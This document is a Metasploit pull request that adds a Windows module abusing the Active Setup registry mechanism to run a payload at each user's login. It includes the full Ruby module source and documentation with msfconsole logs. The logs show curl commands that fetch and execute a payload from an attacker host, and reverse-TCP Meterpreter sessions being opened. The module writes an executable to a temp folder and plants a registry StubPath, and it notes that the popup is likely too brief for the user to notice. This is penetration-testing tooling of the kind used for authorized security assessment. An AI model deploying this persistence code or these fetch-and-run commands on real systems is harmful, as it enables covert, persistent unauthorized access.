### PR TITLE
active setup persistence

### DIFF
--- a/documentation/modules/exploit/windows/persistence/registry_active_setup.md
+++ b/documentation/modules/exploit/windows/persistence/registry_active_setup.md
@@ -1,0 +1,121 @@
+## Vulnerable Application
+
+This module will register a payload to run via the Active Setup mechanism in Windows.
+Active Setup is a Windows feature that runs once per user at login.
+It triggers in a user context, losing privileges from admin to user.
+
+Active Setup will open a popup box with "Personalized Settings" and the text
+"Setting up personalized settings for: <SETUP_NAME>". However
+this won't occur until the login screen has exited (but before the desktop
+is loaded), and our execution is extremely fast so likely the user will not
+see it.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get an admin level shell on windows
+3. Do: `use exploit/windows/persistence/registry_active_setup`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get a shell when a user logs in.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### SETUP_NAME
+
+Name of the setup program. Defaults to `Update`
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Get an admin level shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50118) at 2026-01-03 09:49:55 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/registry_active_setup 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry_active_setup) > set session 1
+session => 1
+msf exploit(windows/persistence/registry_active_setup) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry_active_setup) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/registry_active_setup) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] Powershell detected on system
+[*] Checking registry write access to: HKLM\Software\Microsoft\Active Setup\Installed Components\{edf4fbde-3fab-d202-8371-77de31d09b02}
+[+] The target is vulnerable. Registry writable
+[+] Writing payload to C:\Users\windows\AppData\Local\Temp\AdWTZDgKYI.exe
+[*] Using installer guid: {a00a9f75-6cc7-bfbc-ee68-a461fe0ec2cc}
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.5133/WIN10PROLICENSE_20260103.5133.rc
+```
+
+Logoff, and back on
+
+```
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50126) at 2026-01-03 09:53:36 -0500
+```

--- a/modules/exploits/windows/persistence/registry_active_setup.rb
+++ b/modules/exploits/windows/persistence/registry_active_setup.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Registry Active Setup Persistence',
+        'Description' => %q{
+          This module will register a payload to run via the Active Setup mechanism in Windows.
+          Active Setup is a Windows feature that runs once per user at login.
+          It triggers in a user context, losing privileges from admin to user.
+
+          Active Setup will open a popup box with "Personalized Settings" and the text
+          "Setting up personalized settings for: <SETUP_NAME>". However
+          this won't occur until the login screen has exited (but before the desktop
+          is loaded), and our execution is extremely fast so likely the user will not
+          see it.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['ATT&CK', Mitre::Attack::Technique::T1547_014_ACTIVE_SETUP],
+          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-12-01',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+      OptString.new('SETUP_NAME', [false, 'Name of the setup program.', 'Update']),
+    ])
+  end
+
+  def regkey
+    'HKLM\\Software\\Microsoft\\Active Setup\\Installed Components'
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
+
+    vprint_good('Powershell detected on system')
+
+    # test write to see if we have access
+    rand = Rex::Text.rand_guid
+
+    vprint_status("Checking registry write access to: #{regkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{regkey}\\#{rand}") if registry_createkey("#{regkey}\\#{rand}").nil?
+
+    registry_deletekey("#{regkey}\\#{rand}")
+
+    Msf::Exploit::CheckCode::Vulnerable('Registry writable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_exe = generate_payload_exe
+    payload_pathname = writable_dir + '\\' + payload_name + '.exe'
+    vprint_good("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
+
+    rand = Rex::Text.rand_guid
+    rand = Rex::Text.rand_guid while registry_key_exist?("#{regkey}\\#{rand}")
+
+    print_status("Using installer guid: #{rand}")
+    registry_createkey("#{regkey}\\#{rand}")
+    registry_setvaldata("#{regkey}\\#{rand}", 'StubPath', "cmd /c start \"\" \"#{payload_pathname}\"", 'REG_SZ')
+    registry_setvaldata("#{regkey}\\#{rand}", '', datastore['SETUP_NAME'], 'REG_SZ')
+
+    @clean_up_rc = %(execute -f cmd.exe -a "/c reg delete \\\"#{regkey}\\#{rand}\\\" /f" -H\n)
+    @clean_up_rc << %(execute -f cmd.exe -a "/c reg delete \\\"#{regkey.sub('HKLM', 'HKCU')}\\#{rand}\\\" /f" -H\n)
+    @clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
+  end
+end

--- a/modules/exploits/windows/persistence/registry_active_setup.rb
+++ b/modules/exploits/windows/persistence/registry_active_setup.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Local
           'h00die',
         ],
         'Platform' => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ]
         ],

--- a/modules/exploits/windows/persistence/registry_active_setup.rb
+++ b/modules/exploits/windows/persistence/registry_active_setup.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def install_persistence
- payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
     payload_name << '.exe' unless payload_name.downcase.end_with?('.exe')
     payload_exe = generate_payload_exe
     payload_pathname = writable_dir + '\\' + payload_name + '.exe'

--- a/modules/exploits/windows/persistence/registry_active_setup.rb
+++ b/modules/exploits/windows/persistence/registry_active_setup.rb
@@ -88,7 +88,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def install_persistence
-    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+ payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_name << '.exe' unless payload_name.downcase.end_with?('.exe')
     payload_exe = generate_payload_exe
     payload_pathname = writable_dir + '\\' + payload_name + '.exe'
     vprint_good("Writing payload to #{payload_pathname}")

--- a/modules/exploits/windows/persistence/registry_active_setup.rb
+++ b/modules/exploits/windows/persistence/registry_active_setup.rb
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
           ['ATT&CK', Mitre::Attack::Technique::T1547_014_ACTIVE_SETUP],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
         ],
         'DefaultTarget' => 0,


### PR DESCRIPTION
fixes #20824

Windows has a feature called active setup. You notice it when you login and a grey box pops up in the top left of the screen, talking about configuring personalizations bla bla bla. We can abuse that to launch our payload, with 2 caveats. 1) you downgrade from admin to user permissions, 2) it only launches the payload once per user

## Verification

1. Start msfconsole
2. Get an admin level shell on windows
3. Do: `use exploit/windows/persistence/registry_active_setup`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when a user logs in.
